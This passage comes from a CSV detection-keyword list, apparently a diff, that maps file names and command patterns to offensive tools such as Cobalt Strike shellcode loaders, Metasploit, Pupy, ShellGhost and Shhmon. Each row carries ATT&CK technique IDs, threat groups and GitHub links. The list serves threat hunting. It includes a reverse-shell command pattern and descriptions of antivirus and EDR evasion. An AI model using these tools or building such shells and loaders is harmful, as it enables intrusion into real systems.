TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*shellcode_exec.py*","offensive_tool_keyword","pupy","Pupy is an 
opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*shellcode_generator.*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z" +"*shellcode_generator_help.html*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Generator","T1548.002 - 
T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RCStep/CSSG","1","1","N/A","10","10","555","108","2023-09-07T19:41:31Z","2021-01-12T14:39:06Z"
+"*shellcode_inject.csproj*","offensive_tool_keyword","PowerLessShell","PowerLessShell rely on MSBuild.exe to remotely execute PowerShell scripts and commands without spawning powershell.exe. You can also execute raw shellcode using the same approach.","T1218.010 - T1059 - T1105 - T1047 - T1055","TA0002 - TA0011 - TA0008","N/A","N/A","Defense Evasion","https://github.com/Mr-Un1k0d3r/PowerLessShell","1","1","N/A","N/A","10","1395","253","2023-03-23T13:30:14Z","2017-05-29T23:03:52Z"
+"*shellcode_inject.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*ShellCode_Loader.py*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z"
+"*shellcode1 += b*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z"
+"*shellcode20.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z"
+"*shellcode30.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z"
+"*shellcode35.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z"
+"*shellcode40.exe*","offensive_tool_keyword","cobaltstrike","python ShellCode Loader (Cobaltstrike&Metasploit)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/OneHone/C--Shellcode","1","1","N/A","10","10","21","2","2019-11-28T01:53:55Z","2019-11-05T09:48:14Z"
+"*Shellcode-Download_CreateThread_Execution*","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","229","49","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z"
+"*Shellcode-Downloader-CreateThread-Execution*","offensive_tool_keyword","Shellcode-Downloader-CreateThread-Execution","This POC gives you the possibility to compile a .exe to completely avoid statically detection by AV/EPP/EDR of your C2-shellcode and download and execute your C2-shellcode which is hosted on your (C2)-webserver.","T1548 T1562 T1027 ","N/A","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Shellcode-Downloader-CreateThread-Execution","1","1","N/A","N/A","3","229","49","2023-05-25T02:48:55Z","2022-03-27T07:51:08Z"
+"*shellcodeEncryptDecrypt*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
+"*shellcode-exec.ps1*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A",,"N/A",,,
+"*shellcodeexec.x32*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*shellcodeexec.x64*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z"
+"*ShellcodeFluctuation.*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
+"*ShellcodeFluctuation64*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
+"*ShellcodeFluctuation86*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z"
+"*Shellcode-Hide-main*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z"
+"*Shellcode-Loader-master*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z"
+"*ShellcodeRDI.*","offensive_tool_keyword","sRDI","Shellcode Reflective DLL Injection - Shellcode implementation of Reflective DLL Injection. Convert DLLs to position independent shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/monoxgas/sRDI","1","1","N/A","N/A","10","1855","445","2022-12-14T16:01:43Z","2017-07-28T19:30:53Z"
+"*ShellcodeRDI.py*","offensive_tool_keyword","EvtMute","This is a tool that allows you to offensively use YARA to apply a filter to the events being reported by windows event logging - mute the event log","T1562.004 - T1055.001 - T1070.004","TA0040 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/bats3c/EvtMute","1","1","N/A","10","3","240","46","2021-04-24T19:23:39Z","2020-08-29T00:13:20Z"
+"*ShellcodeRDI.py*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*shellcode-runner.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A",,"N/A",,,
+"*ShellcodeTemplate.x64.bin*","offensive_tool_keyword","DllNotificationInjection","A POC of a new threadless process injection technique that works by utilizing the concept of DLL Notification Callbacks in local and remote processes.","T1055.011 - T1055.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ShorSec/DllNotificationInjection","1","1","N/A","10","4","319","56","2023-08-23T13:50:27Z","2023-08-14T11:22:30Z"
+"*shellcodetester *","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","0","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*ShellCodeTester.csproj*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*shellcodetester.exe*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*shellcodetester.git*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*shellcodetester.sh*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*ShellCodeTester.sln*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z"
+"*shellerator --reverse-shell --lhost * --lport * --type *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*ShellGhost.dll","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*ShellGhost.exe*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*ShellGhost.sln*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*ShellGhost.vcxproj*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*ShellGhost_mapping.py*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*ShellGhost-master.zip*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z"
+"*shellter.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*shepardsbind_recv.py*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*shepbind_serv.exe*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*Sherlock.ps1*","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1009","830","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z"
+"*sherlock.ps1*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z"
+"*Sherlock_Vulns.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*Shhmon.csproj*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z"
